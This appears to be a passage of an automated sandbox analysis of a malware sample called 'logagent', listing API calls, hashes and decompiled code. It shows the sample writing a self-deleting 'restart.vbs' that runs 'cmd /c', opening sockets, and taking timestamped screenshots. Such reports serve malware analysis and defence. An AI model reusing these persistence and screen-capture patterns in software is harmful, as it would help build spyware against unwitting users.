                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                  • exit.MSVCRT ref: 00408B3D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                  • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                  • API String ID: 864010295-1332127163
                                  • Opcode ID: 15269cf6162d4acb015cf3b22ae6787d784795f5e1225b26d6d716e11b425a87
                                  • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                  • Opcode Fuzzy Hash: 15269cf6162d4acb015cf3b22ae6787d784795f5e1225b26d6d716e11b425a87
                                  • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                  • _itoa.MSVCRT ref: 0040F75C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 00402118: CreateThread.KERNEL32 ref: 0040212D
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                    • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                  • String ID: image/jpeg
                                  • API String ID: 1042780377-3785015651
                                  • Opcode ID: 1d0f8d6bda50375055f149ac91595ac81ba6f40a75dddab217261ebb9b9087b2
                                  • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                  • Opcode Fuzzy Hash: 1d0f8d6bda50375055f149ac91595ac81ba6f40a75dddab217261ebb9b9087b2
                                  • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00410B20
                                  • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                  • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                  • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                  • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                    • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                    • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                    • Part of subcall function 0041093F: SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                    • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                    • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                    • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                  • atoi.MSVCRT ref: 00410DA2
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                  • atoi.MSVCRT ref: 00410DD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@CreateSleepatoi$?length@?$basic_string@D@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimeswprintf
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                  • API String ID: 2994672083-3790400642
                                  • Opcode ID: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                  • Opcode Fuzzy Hash: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 21%
                                  			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
                                  				char _v20;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				char _v104;
                                  				char _v120;
                                  				char _v136;
                                  				char _v152;
                                  				char _v168;
                                  				char _v184;
                                  				char _v200;
                                  				char _v216;
                                  				void* _t69;
                                  				void* _t74;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t78;
                                  				char* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t88;
                                  				char* _t92;
                                  				void* _t94;
                                  				void* _t95;
                                  				void* _t97;
                                  				char* _t101;
                                  				void* _t103;
                                  				void* _t104;
                                  				void* _t106;
                                  				char* _t110;
                                  				void* _t112;
                                  				char* _t118;
                                  				char* _t119;
                                  				char* _t120;
                                  				intOrPtr* _t123;
                                  				void* _t125;
                                  				void* _t127;
                                  				char* _t130;
                                  				char* _t135;
                                  				char* _t136;
                                  				char* _t137;
                                  				intOrPtr _t139;
                                  				void* _t230;
                                  				void* _t233;
                                  				void* _t235;
                                  				void* _t236;
                                  				void* _t241;
                                  				void* _t242;
                                  				void* _t247;
                                  				void* _t248;
                                  				void* _t253;
                                  				void* _t254;
                                  				void* _t264;
                                  				void* _t265;
                                  
                                  				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                  				_t139 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
                                  				_t233 = _t230 + 0x24;
                                  				_t69 = _t139 - 1;
                                  				if(_t69 == 0) {
                                  					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
                                  					E004020C2(0x41c130);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
                                  					L26:
                                  					_t74 = E004017DD( &_v20);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t74;
                                  				}
                                  				_t75 = _t69 - 1;
                                  				if(_t75 == 0) {
                                  					_t76 = E004119AD( &_v20, 0);
                                  					_t235 = _t233 - 0x10;
                                  					_push(_t76);
                                  					E00412881(_t76);
                                  					_t78 = E00411700(_t235);
                                  					_t236 = _t235 + 0x10;
                                  					__eflags = _t78;
                                  					if(_t78 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x80);
                                  						L14:
                                  						E004020C2(0x41c130);
                                  						goto L26;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t83 =  &_v184;
                                  					_push(_t83);
                                  					L00414140();
                                  					_push(_t83);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
                                  					L23:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					goto L26;
                                  				}
                                  				_t85 = _t75 - 1;
                                  				if(_t85 == 0) {
                                  					_t86 = E004119AD( &_v20, 0);
                                  					_t241 = _t233 - 0x10;
                                  					_push(_t86);
                                  					E00412881(_t86);
                                  					_t88 = E00411760(_t241);
                                  					_t242 = _t241 + 0x10;
                                  					__eflags = _t88;
                                  					if(_t88 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x81);
                                  						goto L14;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t92 =  &_v152;
                                  					_push(_t92);
                                  					L00414140();
                                  					_push(_t92);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
                                  					goto L23;
                                  				}
                                  				_t94 = _t85 - 1;
                                  				if(_t94 == 0) {
                                  					_t95 = E004119AD( &_v20, 0);
                                  					_t247 = _t233 - 0x10;
                                  					_push(_t95);
                                  					E00412881(_t95);
                                  					_t97 = E00411859(_t247);
                                  					_t248 = _t247 + 0x10;
                                  					__eflags = _t97;
                                  					if(_t97 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x82);
                                  						goto L14;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t101 =  &_v120;
                                  					_push(_t101);
                                  					L00414140();
                                  					_push(_t101);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
                                  					goto L23;
                                  				}
                                  				_t103 = _t94 - 1;
                                  				if(_t103 == 0) {
                                  					_t104 = E004119AD( &_v20, 0);
                                  					_t253 = _t233 - 0x10;
                                  					_push(_t104);
                                  					E00412881(_t104);
                                  					_t106 = E004118C0(_t253);
                                  					_t254 = _t253 + 0x10;
                                  					__eflags = _t106;
                                  					if(_t106 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x83);
                                  						goto L14;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t110 =  &_v88;
                                  					_push(_t110);
                                  					L00414140();
                                  					_push(_t110);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
                                  					goto L23;
                                  				}
                                  				_t112 = _t103 - 1;
                                  				if(_t112 == 0) {
                                  					E00412881(_t113);
                                  					_v24 = E004117C7(_t233 - 0x10);
                                  					_t118 =  &_v72;
                                  					L00414140();
                                  					_t119 =  &_v136;
                                  					L00414140();
                                  					_t120 =  &_v56;
                                  					L00414140();
                                  					L0041417C();
                                  					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
